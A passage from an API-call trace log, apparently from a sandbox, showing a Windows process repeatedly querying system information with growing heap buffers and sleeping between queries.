0x29585b8 [0228.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.677] Sleep (dwMilliseconds=0x110) [0228.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.695] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.695] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.696] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.696] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.696] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.696] Sleep (dwMilliseconds=0x110) [0228.700] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.700] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.703] Sleep (dwMilliseconds=0x110) [0228.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.723] Sleep (dwMilliseconds=0x110) [0228.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.735] Sleep (dwMilliseconds=0x110) [0228.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.751] Sleep (dwMilliseconds=0x110) [0228.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.771] Sleep (dwMilliseconds=0x110) [0228.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.785] Sleep (dwMilliseconds=0x110) [0228.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.798] Sleep (dwMilliseconds=0x110) [0228.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.814] Sleep (dwMilliseconds=0x110) [0228.825] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.825] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.830] Sleep (dwMilliseconds=0x110) [0228.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.848] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.849] Sleep (dwMilliseconds=0x110) [0228.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.864] Sleep (dwMilliseconds=0x110) [0228.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 